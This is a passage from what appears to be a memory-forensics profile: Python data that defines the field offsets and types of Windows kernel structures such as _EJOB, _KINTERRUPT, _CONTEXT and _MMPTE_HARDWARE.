'HardFault' : [ 0x0, ['BitField', dict(start_bit = 9, end_bit = 10, native_type='unsigned long')]],
'Spare1' : [ 0x0, ['BitField', dict(start_bit = 10, end_bit = 12, native_type='unsigned long')]],
} ],
'_MM_PAGE_ACCESS_INFO_FLAGS' : [ 0x4, {
'File' : [ 0x0, ['__unnamed_1c1b']],
'Private' : [ 0x0, ['__unnamed_1c1d']],
} ],
'_VI_VERIFIER_ISSUE' : [ 0x10, {
'IssueType' : [ 0x0, ['unsigned long']],
'Address' : [ 0x4, ['pointer', ['void']]],
'Parameters' : [ 0x8, ['array', 2, ['unsigned long']]],
} ],
'_MMSUBSECTION_FLAGS' : [ 0x4, {
'SubsectionAccessed' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned short')]],
'Protection' : [ 0x0, ['BitField', dict(start_bit = 1, end_bit = 6, native_type='unsigned short')]],
'StartingSector4132' : [ 0x0, ['BitField', dict(start_bit = 6, end_bit = 16, native_type='unsigned short')]],
'SubsectionStatic' : [ 0x2, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned short')]],
'GlobalMemory' : [ 0x2, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned short')]],
'DirtyPages' : [ 0x2, ['BitField', dict(start_bit = 2, end_bit = 3, native_type='unsigned short')]],
'Spare' : [ 0x2, ['BitField', dict(start_bit = 3, end_bit = 4, native_type='unsigned short')]],
'SectorEndOffset' : [ 0x2, ['BitField', dict(start_bit = 4, end_bit = 16, native_type='unsigned short')]],
} ],
'_EXCEPTION_POINTERS' : [ 0x8, {
'ExceptionRecord' : [ 0x0, ['pointer', ['_EXCEPTION_RECORD']]],
'ContextRecord' : [ 0x4, ['pointer', ['_CONTEXT']]],
} ],
'_OBJECT_REF_INFO' : [ 0x1c, {
'ObjectHeader' : [ 0x0, ['pointer', ['_OBJECT_HEADER']]],
'NextRef' : [ 0x4, ['pointer', ['void']]],
'ImageFileName' : [ 0x8, ['array', 16, ['unsigned char']]],
'NextPos' : [ 0x18, ['unsigned short']],
'MaxStacks' : [ 0x1a, ['unsigned short']],
'StackInfo' : [ 0x1c, ['array', 0, ['_OBJECT_REF_STACK_INFO']]],
} ],
'_HBIN' : [ 0x20, {
'Signature' : [ 0x0, ['unsigned long']],
'FileOffset' : [ 0x4, ['unsigned long']],
'Size' : [ 0x8, ['unsigned long']],
'Reserved1' : [ 0xc, ['array', 2, ['unsigned long']]],
'TimeStamp' : [ 0x14, ['_LARGE_INTEGER']],
'Spare' : [ 0x1c, ['unsigned long']],
} ],
'_MI_IMAGE_SECURITY_REFERENCE' : [ 0xc, {
'SecurityContext' : [ 0x0, ['_IMAGE_SECURITY_CONTEXT']],
'DynamicRelocations' : [ 0x4, ['pointer', ['void']]],
'ReferenceCount' : [ 0x8, ['long']],
} ],
'_HEAP_TAG_ENTRY' : [ 0x40, {
'Allocs' : [ 0x0, ['unsigned long']],
'Frees' : [ 0x4, ['unsigned long']],
'Size' : [ 0x8, ['unsigned long']],
'TagIndex' : [ 0xc, ['unsigned short']],
'CreatorBackTraceIndex' : [ 0xe, ['unsigned short']],
'TagName' : [ 0x10, ['array', 24, ['wchar']]],
} ],
'_SECURITY_QUALITY_OF_SERVICE' : [ 0xc, {
'Length' : [ 0x0, ['unsigned long']],
'ImpersonationLevel' : [ 0x4, ['Enumeration', dict(target = 'long', choices = {0: 'SecurityAnonymous', 1: 'SecurityIdentification', 2: 'SecurityImpersonation', 3: 'SecurityDelegation'})]],
'ContextTrackingMode' : [ 0x8, ['unsigned char']],
'EffectiveOnly' : [ 0x9, ['unsigned char']],
} ],
'__unnamed_1c3f' : [ 0x8, {
'List' : [ 0x0, ['_LIST_ENTRY']],
'Secured' : [ 0x0, ['_MMADDRESS_LIST']],
} ],
'__unnamed_1c45' : [ 0x4, {
'Banked' : [ 0x0, ['pointer', ['_MMBANKED_SECTION']]],
'ExtendedInfo' : [ 0x0, ['pointer', ['_MMEXTEND_INFO']]],
} ],
'_MMVAD_LONG' : [ 0x48, {
'u1' : [ 0x0, ['__unnamed_1580']],
'LeftChild' : [ 0x4, ['pointer', ['_MMVAD']]],
'RightChild' : [ 0x8, ['pointer', ['_MMVAD']]],
'StartingVpn' : [ 0xc, ['unsigned long']],
'EndingVpn' : [ 0x10, ['unsigned long']],
'u' : [ 0x14, ['__unnamed_1583']],
'PushLock' : [ 0x18, ['_EX_PUSH_LOCK']],
'u5' : [ 0x1c, ['__unnamed_1586']],
'u2' : [ 0x20, ['__unnamed_1593']],
'Subsection' : [ 0x24, ['pointer', ['_SUBSECTION']]],
'FirstPrototypePte' : [ 0x28, ['pointer', ['_MMPTE']]],
'LastContiguousPte' : [ 0x2c, ['pointer', ['_MMPTE']]],
'ViewLinks' : [ 0x30, ['_LIST_ENTRY']],
'VadsProcess' : [ 0x38, ['pointer', ['_EPROCESS']]],
'u3' : [ 0x3c, ['__unnamed_1c3f']],
'u4' : [ 0x44, ['__unnamed_1c45']],
} ],
'_MMWSLE_FREE_ENTRY' : [ 0x4, {
'MustBeZero' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned long')]],
'PreviousFree' : [ 0x0, ['BitField', dict(start_bit = 1, end_bit = 12, native_type='unsigned long')]],
'NextFree' : [ 0x0, ['BitField', dict(start_bit = 12, end_bit = 32, native_type='unsigned long')]],
} ],
'_NT_TIB' : [ 0x1c, {
'ExceptionList' : [ 0x0, ['pointer', ['_EXCEPTION_REGISTRATION_RECORD']]],
'StackBase' : [ 0x4, ['pointer', ['void']]],
'StackLimit' : [ 0x8, ['pointer', ['void']]],
'SubSystemTib' : [ 0xc, ['pointer', ['void']]],
'FiberData' : [ 0x10, ['pointer', ['void']]],
'Version' : [ 0x10, ['unsigned long']],
'ArbitraryUserPointer' : [ 0x14, ['pointer', ['void']]],
'Self' : [ 0x18, ['pointer', ['_NT_TIB']]],
} ],
'_WHEA_REVISION' : [ 0x2, {
'MinorRevision' : [ 0x0, ['unsigned char']],
'MajorRevision' : [ 0x1, ['unsigned char']],
'AsUSHORT' : [ 0x0, ['unsigned short']],
} ],
'_EJOB' : [ 0x138, {
'Event' : [ 0x0, ['_KEVENT']],
'JobLinks' : [ 0x10, ['_LIST_ENTRY']],
'ProcessListHead' : [ 0x18, ['_LIST_ENTRY']],
'JobLock' : [ 0x20, ['_ERESOURCE']],
'TotalUserTime' : [ 0x58, ['_LARGE_INTEGER']],
'TotalKernelTime' : [ 0x60, ['_LARGE_INTEGER']],
'ThisPeriodTotalUserTime' : [ 0x68, ['_LARGE_INTEGER']],
'ThisPeriodTotalKernelTime' : [ 0x70, ['_LARGE_INTEGER']],
'TotalPageFaultCount' : [ 0x78, ['unsigned long']],
'TotalProcesses' : [ 0x7c, ['unsigned long']],
'ActiveProcesses' : [ 0x80, ['unsigned long']],
'TotalTerminatedProcesses' : [ 0x84, ['unsigned long']],
'PerProcessUserTimeLimit' : [ 0x88, ['_LARGE_INTEGER']],
'PerJobUserTimeLimit' : [ 0x90, ['_LARGE_INTEGER']],
'MinimumWorkingSetSize' : [ 0x98, ['unsigned long']],
'MaximumWorkingSetSize' : [ 0x9c, ['unsigned long']],
'LimitFlags' : [ 0xa0, ['unsigned long']],
'ActiveProcessLimit' : [ 0xa4, ['unsigned long']],
'Affinity' : [ 0xa8, ['_KAFFINITY_EX']],
'PriorityClass' : [ 0xb4, ['unsigned char']],
'AccessState' : [ 0xb8, ['pointer', ['_JOB_ACCESS_STATE']]],
'UIRestrictionsClass' : [ 0xbc, ['unsigned long']],
'EndOfJobTimeAction' : [ 0xc0, ['unsigned long']],
'CompletionPort' : [ 0xc4, ['pointer', ['void']]],
'CompletionKey' : [ 0xc8, ['pointer', ['void']]],
'SessionId' : [ 0xcc, ['unsigned long']],
'SchedulingClass' : [ 0xd0, ['unsigned long']],
'ReadOperationCount' : [ 0xd8, ['unsigned long long']],
'WriteOperationCount' : [ 0xe0, ['unsigned long long']],
'OtherOperationCount' : [ 0xe8, ['unsigned long long']],
'ReadTransferCount' : [ 0xf0, ['unsigned long long']],
'WriteTransferCount' : [ 0xf8, ['unsigned long long']],
'OtherTransferCount' : [ 0x100, ['unsigned long long']],
'ProcessMemoryLimit' : [ 0x108, ['unsigned long']],
'JobMemoryLimit' : [ 0x10c, ['unsigned long']],
'PeakProcessMemoryUsed' : [ 0x110, ['unsigned long']],
'PeakJobMemoryUsed' : [ 0x114, ['unsigned long']],
'CurrentJobMemoryUsed' : [ 0x118, ['unsigned long long']],
'MemoryLimitsLock' : [ 0x120, ['_EX_PUSH_LOCK']],
'JobSetLinks' : [ 0x124, ['_LIST_ENTRY']],
'MemberLevel' : [ 0x12c, ['unsigned long']],
'JobFlags' : [ 0x130, ['unsigned long']],
} ],
'__unnamed_1c56' : [ 0x4, {
'AsULONG' : [ 0x0, ['unsigned long']],
'AllowScaling' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned long')]],
'Disabled' : [ 0x0, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned long')]],
'HvMaxCState' : [ 0x0, ['BitField', dict(start_bit = 2, end_bit = 6, native_type='unsigned long')]],
'Reserved' : [ 0x0, ['BitField', dict(start_bit = 6, end_bit = 32, native_type='unsigned long')]],
} ],
'_PPM_IDLE_STATES' : [ 0x68, {
'Count' : [ 0x0, ['unsigned long']],
'Flags' : [ 0x4, ['__unnamed_1c56']],
'TargetState' : [ 0x8, ['unsigned long']],
'ActualState' : [ 0xc, ['unsigned long']],
'OldState' : [ 0x10, ['unsigned long']],
'NewlyUnparked' : [ 0x14, ['unsigned char']],
'TargetProcessors' : [ 0x18, ['_KAFFINITY_EX']],
'State' : [ 0x28, ['array', 1, ['_PPM_IDLE_STATE']]],
} ],
'__unnamed_1c5f' : [ 0x10, {
'EfiInformation' : [ 0x0, ['_EFI_FIRMWARE_INFORMATION']],
'PcatInformation' : [ 0x0, ['_PCAT_FIRMWARE_INFORMATION']],
} ],
'_FIRMWARE_INFORMATION_LOADER_BLOCK' : [ 0x14, {
'FirmwareTypeEfi' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned long')]],
'Reserved' : [ 0x0, ['BitField', dict(start_bit = 1, end_bit = 32, native_type='unsigned long')]],
'u' : [ 0x4, ['__unnamed_1c5f']],
} ],
'_HEAP_UCR_DESCRIPTOR' : [ 0x18, {
'ListEntry' : [ 0x0, ['_LIST_ENTRY']],
'SegmentEntry' : [ 0x8, ['_LIST_ENTRY']],
'Address' : [ 0x10, ['pointer', ['void']]],
'Size' : [ 0x14, ['unsigned long']],
} ],
'_ETW_REALTIME_CONSUMER' : [ 0x50, {
'Links' : [ 0x0, ['_LIST_ENTRY']],
'ProcessHandle' : [ 0x8, ['pointer', ['void']]],
'ProcessObject' : [ 0xc, ['pointer', ['_EPROCESS']]],
'NextNotDelivered' : [ 0x10, ['pointer', ['void']]],
'RealtimeConnectContext' : [ 0x14, ['pointer', ['void']]],
'DisconnectEvent' : [ 0x18, ['pointer', ['_KEVENT']]],
'DataAvailableEvent' : [ 0x1c, ['pointer', ['_KEVENT']]],
'UserBufferCount' : [ 0x20, ['pointer', ['unsigned long']]],
'UserBufferListHead' : [ 0x24, ['pointer', ['_SINGLE_LIST_ENTRY']]],
'BuffersLost' : [ 0x28, ['unsigned long']],
'EmptyBuffersCount' : [ 0x2c, ['unsigned long']],
'LoggerId' : [ 0x30, ['unsigned long']],
'ShutDownRequested' : [ 0x34, ['unsigned char']],
'NewBuffersLost' : [ 0x35, ['unsigned char']],
'Disconnected' : [ 0x36, ['unsigned char']],
'ReservedBufferSpaceBitMap' : [ 0x38, ['_RTL_BITMAP']],
'ReservedBufferSpace' : [ 0x40, ['pointer', ['unsigned char']]],
'ReservedBufferSpaceSize' : [ 0x44, ['unsigned long']],
'UserPagesAllocated' : [ 0x48, ['unsigned long']],
'UserPagesReused' : [ 0x4c, ['unsigned long']],
} ],
'__unnamed_1c68' : [ 0x4, {
'BaseMid' : [ 0x0, ['unsigned char']],
'Flags1' : [ 0x1, ['unsigned char']],
'Flags2' : [ 0x2, ['unsigned char']],
'BaseHi' : [ 0x3, ['unsigned char']],
} ],
'__unnamed_1c6e' : [ 0x4, {
'BaseMid' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 8, native_type='unsigned long')]],
'Type' : [ 0x0, ['BitField', dict(start_bit = 8, end_bit = 13, native_type='unsigned long')]],
'Dpl' : [ 0x0, ['BitField', dict(start_bit = 13, end_bit = 15, native_type='unsigned long')]],
'Pres' : [ 0x0, ['BitField', dict(start_bit = 15, end_bit = 16, native_type='unsigned long')]],
'LimitHi' : [ 0x0, ['BitField', dict(start_bit = 16, end_bit = 20, native_type='unsigned long')]],
'Sys' : [ 0x0, ['BitField', dict(start_bit = 20, end_bit = 21, native_type='unsigned long')]],
'Reserved_0' : [ 0x0, ['BitField', dict(start_bit = 21, end_bit = 22, native_type='unsigned long')]],
'Default_Big' : [ 0x0, ['BitField', dict(start_bit = 22, end_bit = 23, native_type='unsigned long')]],
'Granularity' : [ 0x0, ['BitField', dict(start_bit = 23, end_bit = 24, native_type='unsigned long')]],
'BaseHi' : [ 0x0, ['BitField', dict(start_bit = 24, end_bit = 32, native_type='unsigned long')]],
} ],
'__unnamed_1c70' : [ 0x4, {
'Bytes' : [ 0x0, ['__unnamed_1c68']],
'Bits' : [ 0x0, ['__unnamed_1c6e']],
} ],
'_KGDTENTRY' : [ 0x8, {
'LimitLow' : [ 0x0, ['unsigned short']],
'BaseLow' : [ 0x2, ['unsigned short']],
'HighWord' : [ 0x4, ['__unnamed_1c70']],
} ],
'_POOL_DESCRIPTOR' : [ 0x1140, {
'PoolType' : [ 0x0, ['Enumeration', dict(target = 'long', choices = {0: 'NonPagedPool', 1: 'PagedPool', 2: 'NonPagedPoolMustSucceed', 3: 'DontUseThisType', 4: 'NonPagedPoolCacheAligned', 5: 'PagedPoolCacheAligned', 6: 'NonPagedPoolCacheAlignedMustS', 7: 'MaxPoolType', 34: 'NonPagedPoolMustSucceedSession', 35: 'DontUseThisTypeSession', 32: 'NonPagedPoolSession', 36: 'NonPagedPoolCacheAlignedSession', 33: 'PagedPoolSession', 38: 'NonPagedPoolCacheAlignedMustSSession', 37: 'PagedPoolCacheAlignedSession'})]],
'PagedLock' : [ 0x4, ['_KGUARDED_MUTEX']],
'NonPagedLock' : [ 0x4, ['unsigned long']],
'RunningAllocs' : [ 0x40, ['long']],
'RunningDeAllocs' : [ 0x44, ['long']],
'TotalBigPages' : [ 0x48, ['long']],
'ThreadsProcessingDeferrals' : [ 0x4c, ['long']],
'TotalBytes' : [ 0x50, ['unsigned long']],
'PoolIndex' : [ 0x80, ['unsigned long']],
'TotalPages' : [ 0xc0, ['long']],
'PendingFrees' : [ 0x100, ['pointer', ['pointer', ['void']]]],
'PendingFreeDepth' : [ 0x104, ['long']],
'ListHeads' : [ 0x140, ['array', 512, ['_LIST_ENTRY']]],
} ],
'_KGATE' : [ 0x10, {
'Header' : [ 0x0, ['_DISPATCHER_HEADER']],
} ],
'_WHEA_ERROR_RECORD_HEADER' : [ 0x80, {
'Signature' : [ 0x0, ['unsigned long']],
'Revision' : [ 0x4, ['_WHEA_REVISION']],
'SignatureEnd' : [ 0x6, ['unsigned long']],
'SectionCount' : [ 0xa, ['unsigned short']],
'Severity' : [ 0xc, ['Enumeration', dict(target = 'long', choices = {0: 'WheaErrSevRecoverable', 1: 'WheaErrSevFatal', 2: 'WheaErrSevCorrected', 3: 'WheaErrSevInformational'})]],
'ValidBits' : [ 0x10, ['_WHEA_ERROR_RECORD_HEADER_VALIDBITS']],
'Length' : [ 0x14, ['unsigned long']],
'Timestamp' : [ 0x18, ['_WHEA_TIMESTAMP']],
'PlatformId' : [ 0x20, ['_GUID']],
'PartitionId' : [ 0x30, ['_GUID']],
'CreatorId' : [ 0x40, ['_GUID']],
'NotifyType' : [ 0x50, ['_GUID']],
'RecordId' : [ 0x60, ['unsigned long long']],
'Flags' : [ 0x68, ['_WHEA_ERROR_RECORD_HEADER_FLAGS']],
'PersistenceInfo' : [ 0x6c, ['_WHEA_PERSISTENCE_INFO']],
'Reserved' : [ 0x74, ['array', 12, ['unsigned char']]],
} ],
'_ALPC_PROCESS_CONTEXT' : [ 0x10, {
'Lock' : [ 0x0, ['_EX_PUSH_LOCK']],
'ViewListHead' : [ 0x4, ['_LIST_ENTRY']],
'PagedPoolQuotaCache' : [ 0xc, ['unsigned long']],
} ],
'_DRIVER_EXTENSION' : [ 0x1c, {
'DriverObject' : [ 0x0, ['pointer', ['_DRIVER_OBJECT']]],
'AddDevice' : [ 0x4, ['pointer', ['void']]],
'Count' : [ 0x8, ['unsigned long']],
'ServiceKeyName' : [ 0xc, ['_UNICODE_STRING']],
'ClientDriverExtension' : [ 0x14, ['pointer', ['_IO_CLIENT_EXTENSION']]],
'FsFilterCallbacks' : [ 0x18, ['pointer', ['_FS_FILTER_CALLBACKS']]],
} ],
'_PRIVILEGE_SET' : [ 0x14, {
'PrivilegeCount' : [ 0x0, ['unsigned long']],
'Control' : [ 0x4, ['unsigned long']],
'Privilege' : [ 0x8, ['array', 1, ['_LUID_AND_ATTRIBUTES']]],
} ],
'_CM_NOTIFY_BLOCK' : [ 0x2c, {
'HiveList' : [ 0x0, ['_LIST_ENTRY']],
'PostList' : [ 0x8, ['_LIST_ENTRY']],
'KeyControlBlock' : [ 0x10, ['pointer', ['_CM_KEY_CONTROL_BLOCK']]],
'KeyBody' : [ 0x14, ['pointer', ['_CM_KEY_BODY']]],
'Filter' : [ 0x18, ['BitField', dict(start_bit = 0, end_bit = 30, native_type='unsigned long')]],
'WatchTree' : [ 0x18, ['BitField', dict(start_bit = 30, end_bit = 31, native_type='unsigned long')]],
'NotifyPending' : [ 0x18, ['BitField', dict(start_bit = 31, end_bit = 32, native_type='unsigned long')]],
'SubjectContext' : [ 0x1c, ['_SECURITY_SUBJECT_CONTEXT']],
} ],
'_KINTERRUPT' : [ 0x278, {
'Type' : [ 0x0, ['short']],
'Size' : [ 0x2, ['short']],
'InterruptListEntry' : [ 0x4, ['_LIST_ENTRY']],
'ServiceRoutine' : [ 0xc, ['pointer', ['void']]],
'MessageServiceRoutine' : [ 0x10, ['pointer', ['void']]],
'MessageIndex' : [ 0x14, ['unsigned long']],
'ServiceContext' : [ 0x18, ['pointer', ['void']]],
'SpinLock' : [ 0x1c, ['unsigned long']],
'TickCount' : [ 0x20, ['unsigned long']],
'ActualLock' : [ 0x24, ['pointer', ['unsigned long']]],
'DispatchAddress' : [ 0x28, ['pointer', ['void']]],
'Vector' : [ 0x2c, ['unsigned long']],
'Irql' : [ 0x30, ['unsigned char']],
'SynchronizeIrql' : [ 0x31, ['unsigned char']],
'FloatingSave' : [ 0x32, ['unsigned char']],
'Connected' : [ 0x33, ['unsigned char']],
'Number' : [ 0x34, ['unsigned long']],
'ShareVector' : [ 0x38, ['unsigned char']],
'Pad' : [ 0x39, ['array', 3, ['unsigned char']]],
'Mode' : [ 0x3c, ['Enumeration', dict(target = 'long', choices = {0: 'LevelSensitive', 1: 'Latched'})]],
'Polarity' : [ 0x40, ['Enumeration', dict(target = 'long', choices = {0: 'InterruptPolarityUnknown', 1: 'InterruptActiveHigh', 2: 'InterruptActiveLow'})]],
'ServiceCount' : [ 0x44, ['unsigned long']],
'DispatchCount' : [ 0x48, ['unsigned long']],
'Rsvd1' : [ 0x50, ['unsigned long long']],
'DispatchCode' : [ 0x58, ['array', 135, ['unsigned long']]],
} ],
'_HANDLE_TABLE_ENTRY' : [ 0x8, {
'Object' : [ 0x0, ['pointer', ['void']]],
'ObAttributes' : [ 0x0, ['unsigned long']],
'InfoTable' : [ 0x0, ['pointer', ['_HANDLE_TABLE_ENTRY_INFO']]],
'Value' : [ 0x0, ['unsigned long']],
'GrantedAccess' : [ 0x4, ['unsigned long']],
'GrantedAccessIndex' : [ 0x4, ['unsigned short']],
'CreatorBackTraceIndex' : [ 0x6, ['unsigned short']],
'NextFreeTableEntry' : [ 0x4, ['unsigned long']],
} ],
'_SID' : [ 0xc, {
'Revision' : [ 0x0, ['unsigned char']],
'SubAuthorityCount' : [ 0x1, ['unsigned char']],
'IdentifierAuthority' : [ 0x2, ['_SID_IDENTIFIER_AUTHORITY']],
'SubAuthority' : [ 0x8, ['array', 1, ['unsigned long']]],
} ],
'_AUTHZBASEP_SECURITY_ATTRIBUTES_INFORMATION' : [ 0x18, {
'SecurityAttributeCount' : [ 0x0, ['unsigned long']],
'SecurityAttributesList' : [ 0x4, ['_LIST_ENTRY']],
'WorkingSecurityAttributeCount' : [ 0xc, ['unsigned long']],
'WorkingSecurityAttributesList' : [ 0x10, ['_LIST_ENTRY']],
} ],
'_IMAGE_FILE_HEADER' : [ 0x14, {
'Machine' : [ 0x0, ['unsigned short']],
'NumberOfSections' : [ 0x2, ['unsigned short']],
'TimeDateStamp' : [ 0x4, ['unsigned long']],
'PointerToSymbolTable' : [ 0x8, ['unsigned long']],
'NumberOfSymbols' : [ 0xc, ['unsigned long']],
'SizeOfOptionalHeader' : [ 0x10, ['unsigned short']],
'Characteristics' : [ 0x12, ['unsigned short']],
} ],
'_MMEXTEND_INFO' : [ 0x10, {
'CommittedSize' : [ 0x0, ['unsigned long long']],
'ReferenceCount' : [ 0x8, ['unsigned long']],
} ],
'_STRING64' : [ 0x10, {
'Length' : [ 0x0, ['unsigned short']],
'MaximumLength' : [ 0x2, ['unsigned short']],
'Buffer' : [ 0x8, ['unsigned long long']],
} ],
'_HIVE_LIST_ENTRY' : [ 0x58, {
'FileName' : [ 0x0, ['pointer', ['unsigned short']]],
'BaseName' : [ 0x4, ['pointer', ['unsigned short']]],
'RegRootName' : [ 0x8, ['pointer', ['unsigned short']]],
'CmHive' : [ 0xc, ['pointer', ['_CMHIVE']]],
'HHiveFlags' : [ 0x10, ['unsigned long']],
'CmHiveFlags' : [ 0x14, ['unsigned long']],
'CmKcbCacheSize' : [ 0x18, ['unsigned long']],
'CmHive2' : [ 0x1c, ['pointer', ['_CMHIVE']]],
'HiveMounted' : [ 0x20, ['unsigned char']],
'ThreadFinished' : [ 0x21, ['unsigned char']],
'ThreadStarted' : [ 0x22, ['unsigned char']],
'Allocate' : [ 0x23, ['unsigned char']],
'WinPERequired' : [ 0x24, ['unsigned char']],
'StartEvent' : [ 0x28, ['_KEVENT']],
'FinishedEvent' : [ 0x38, ['_KEVENT']],
'MountLock' : [ 0x48, ['_KEVENT']],
} ],
'_CONTEXT' : [ 0x2cc, {
'ContextFlags' : [ 0x0, ['unsigned long']],
'Dr0' : [ 0x4, ['unsigned long']],
'Dr1' : [ 0x8, ['unsigned long']],
'Dr2' : [ 0xc, ['unsigned long']],
'Dr3' : [ 0x10, ['unsigned long']],
'Dr6' : [ 0x14, ['unsigned long']],
'Dr7' : [ 0x18, ['unsigned long']],
'FloatSave' : [ 0x1c, ['_FLOATING_SAVE_AREA']],
'SegGs' : [ 0x8c, ['unsigned long']],
'SegFs' : [ 0x90, ['unsigned long']],
'SegEs' : [ 0x94, ['unsigned long']],
'SegDs' : [ 0x98, ['unsigned long']],
'Edi' : [ 0x9c, ['unsigned long']],
'Esi' : [ 0xa0, ['unsigned long']],
'Ebx' : [ 0xa4, ['unsigned long']],
'Edx' : [ 0xa8, ['unsigned long']],
'Ecx' : [ 0xac, ['unsigned long']],
'Eax' : [ 0xb0, ['unsigned long']],
'Ebp' : [ 0xb4, ['unsigned long']],
'Eip' : [ 0xb8, ['unsigned long']],
'SegCs' : [ 0xbc, ['unsigned long']],
'EFlags' : [ 0xc0, ['unsigned long']],
'Esp' : [ 0xc4, ['unsigned long']],
'SegSs' : [ 0xc8, ['unsigned long']],
'ExtendedRegisters' : [ 0xcc, ['array', 512, ['unsigned char']]],
} ],
'_ALPC_HANDLE_TABLE' : [ 0x10, {
'Handles' : [ 0x0, ['pointer', ['_ALPC_HANDLE_ENTRY']]],
'TotalHandles' : [ 0x4, ['unsigned long']],
'Flags' : [ 0x8, ['unsigned long']],
'Lock' : [ 0xc, ['_EX_PUSH_LOCK']],
} ],
'_MMPTE_HARDWARE' : [ 0x4, {
'Valid' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned long')]],
'Dirty1' : [ 0x0, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned long')]],
'Owner' : [ 0x0, ['BitField', dict(start_bit = 2, end_bit = 3, native_type='unsigned long')]],
'WriteThrough' : [ 0x0, ['BitField', dict(start_bit = 3, end_bit = 4, native_type='unsigned long')]],
'CacheDisable' : [ 0x0, ['BitField', dict(start_bit = 4, end_bit = 5, native_type='unsigned long')]],
'Accessed' : [ 0x0, ['BitField', dict(start_bit = 5, end_bit = 6, native_type='unsigned long')]],
'Dirty' : [ 0x0, ['BitField', dict(start_bit = 6, end_bit = 7, native_type='unsigned long')]],
'LargePage' : [ 0x0, ['BitField', dict(start_bit = 7, end_bit = 8, native_type='unsigned long')]],
'Global' : [ 0x0, ['BitField', dict(start_bit = 8, end_bit = 9, native_type='unsigned long')]],
'CopyOnWrite' : [ 0x0, ['BitField', dict(start_bit = 9, end_bit = 10, native_type='unsigned long')]],
'Unused' : [ 0x0, ['BitField', dict(start_bit = 10, end_bit = 11, native_type='unsigned long')]],
'Write' : [ 0x0, ['BitField', dict(start_bit = 11, end_bit = 12, native_type='unsigned long')]],
'PageFrameNumber' : [ 0x0, ['BitField', dict(start_bit = 12, end_bit = 32, native_type='unsigned long')]],
} ],
'_IO_COMPLETION_CONTEXT' : [ 0x8, {
'Port' : [ 0x0, ['pointer', ['void']]],
'Key' : [ 0x4, ['pointer', ['void']]],
} ],
'_IOV_FORCED_PENDING_TRACE' : [ 0x100, {
'Irp' : [ 0x0, ['pointer', ['_IRP']]],
'Thread' : [ 0x4, ['pointer', ['_ETHREAD']]],
'StackTrace' : [ 0x8, ['array', 62, ['pointer', ['void']]]],
} ],
'_DBGKD_SET_CONTEXT' : [ 0x4, {
'ContextFlags' : [ 0x0, ['unsigned long']],
} ],
'_VI_POOL_ENTRY_INUSE' : [ 0x10, {
'VirtualAddress' : [ 0x0, ['pointer', ['void']]],
'CallingAddress' : [ 0x4, ['pointer', ['void']]],
'NumberOfBytes' : [ 0x8, ['unsigned long']],
'Tag' : [ 0xc, ['unsigned long']],
} ],
'_ALPC_COMPLETION_LIST' : [ 0x54, {
'Entry' : [ 0x0, ['_LIST_ENTRY']],
'OwnerProcess' : [ 0x8, ['pointer', ['_EPROCESS']]],
'Mdl' : [ 0xc, ['pointer', ['_MDL']]],
'UserVa' : [ 0x10, ['pointer', ['void']]],
'UserLimit' : [ 0x14, ['pointer', ['void']]],
'DataUserVa' : [ 0x18, ['pointer', ['void']]],
'SystemVa' : [ 0x1c, ['pointer', ['void']]],
'TotalSize' : [ 0x20, ['unsigned long']],
'Header' : [ 0x24, ['pointer', ['_ALPC_COMPLETION_LIST_HEADER']]],
'List' : [ 0x28, ['pointer', ['void']]],
'ListSize' : [ 0x2c, ['unsigned long']],
'Bitmap' : [ 0x30, ['pointer', ['void']]],
'BitmapSize' : [ 0x34, ['unsigned long']],
'Data' : [ 0x38, ['pointer', ['void']]],
'DataSize' : [ 0x3c, ['unsigned long']],
'BitmapLimit' : [ 0x40, ['unsigned long']],
'BitmapNextHint' : [ 0x44, ['unsigned long']],
'ConcurrencyCount' : [ 0x48, ['unsigned long']],
'AttributeFlags' : [ 0x4c, ['unsigned long']],
'AttributeSize' : [ 0x50, ['unsigned long']],
} ],
'_INTERFACE' : [ 0x10, {
'Size' : [ 0x0, ['unsigned short']],
'Version' : [ 0x2, ['unsigned short']],
'Context' : [ 0x4, ['pointer', ['void']]],
'InterfaceReference' : [ 0x8, ['pointer', ['void']]],
'InterfaceDereference' : [ 0xc, ['pointer', ['void']]],
} ],
'_ACL' : [ 0x8, {
'AclRevision' : [ 0x0, ['unsigned char']],
'Sbz1' : [ 0x1, ['unsigned char']],
'AclSize' : [ 0x2, ['unsigned short']],
'AceCount' : [ 0x4, ['unsigned short']],
'Sbz2' : [ 0x6, ['unsigned short']],
} ],
'_LAZY_WRITER' : [ 0x50, {
'ScanDpc' : [ 0x0, ['_KDPC']],
'ScanTimer' : [ 0x20, ['_KTIMER']],
'ScanActive' : [ 0x48, ['unsigned char']],
'OtherWork' : [ 0x49, ['unsigned char']],
'PendingTeardownScan' : [ 0x4a, ['unsigned char']],
'PendingPeriodicScan' : [ 0x4b, ['unsigned char']],
'PendingLowMemoryScan' : [ 0x4c, ['unsigned char']],
'PendingPowerScan' : [ 0x4d, ['unsigned char']],
} ],
'_PI_BUS_EXTENSION' : [ 0x44, {
'Flags' : [ 0x0, ['unsigned long']],
'NumberCSNs' : [ 0x4, ['unsigned char']],
'ReadDataPort' : [ 0x8, ['pointer', ['unsigned char']]],
'DataPortMapped' : [ 0xc, ['unsigned char']],
'AddressPort' : [ 0x10, ['pointer', ['unsigned char']]],
'AddrPortMapped' : [ 0x14, ['unsigned char']],
'CommandPort' : [ 0x18, ['pointer', ['unsigned char']]],
'CmdPortMapped' : [ 0x1c, ['unsigned char']],
'NextSlotNumber' : [ 0x20, ['unsigned long']],
'DeviceList' : [ 0x24, ['_SINGLE_LIST_ENTRY']],
'CardList' : [ 0x28, ['_SINGLE_LIST_ENTRY']],
'PhysicalBusDevice' : [ 0x2c, ['pointer', ['_DEVICE_OBJECT']]],
'FunctionalBusDevice' : [ 0x30, ['pointer', ['_DEVICE_OBJECT']]],
'AttachedDevice' : [ 0x34, ['pointer', ['_DEVICE_OBJECT']]],
'BusNumber' : [ 0x38, ['unsigned long']],
